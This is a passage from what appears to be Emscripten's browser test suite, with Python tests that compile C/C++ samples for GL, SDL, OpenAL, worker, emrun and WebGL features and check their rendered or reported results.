def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS=1', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
if not wasm and self.is_wasm_backend():
continue
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
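      # 'what' is fetched and installed as Module.memoryInitializerRequest; a valid .mem URL should let
      # the program run normally, while a bogus one triggers the console.warn interception below and
      # reports 0 instead.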
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
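    # post.js is assembled from three pieces: post_prep defines ccall/cwrap/direct-call helpers,
    # post_test invokes them and expects each call to abort unless expected_ok is set, and post_hook
    # reports the value accumulated by main() back to the test harness.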
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
      ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
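    # the side module is preloaded with --preload-file and --use-preload-plugins, so it should show up
    # in Module['preloadedWasm'] and be loadable with a plain dlopen() of /library.so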
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the launched
    # browser will have that directory as its startup directory. The browser does not close as part of the
    # test, which would pin down the cwd on Windows and make the directory impossible to delete, so switch
    # away from it before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--kill_exit', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
print(' '.join(args))
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
  # This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
    # First run the test in Node and/or SPIDERMONKEY using run_js. Use the closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], ['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=[] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
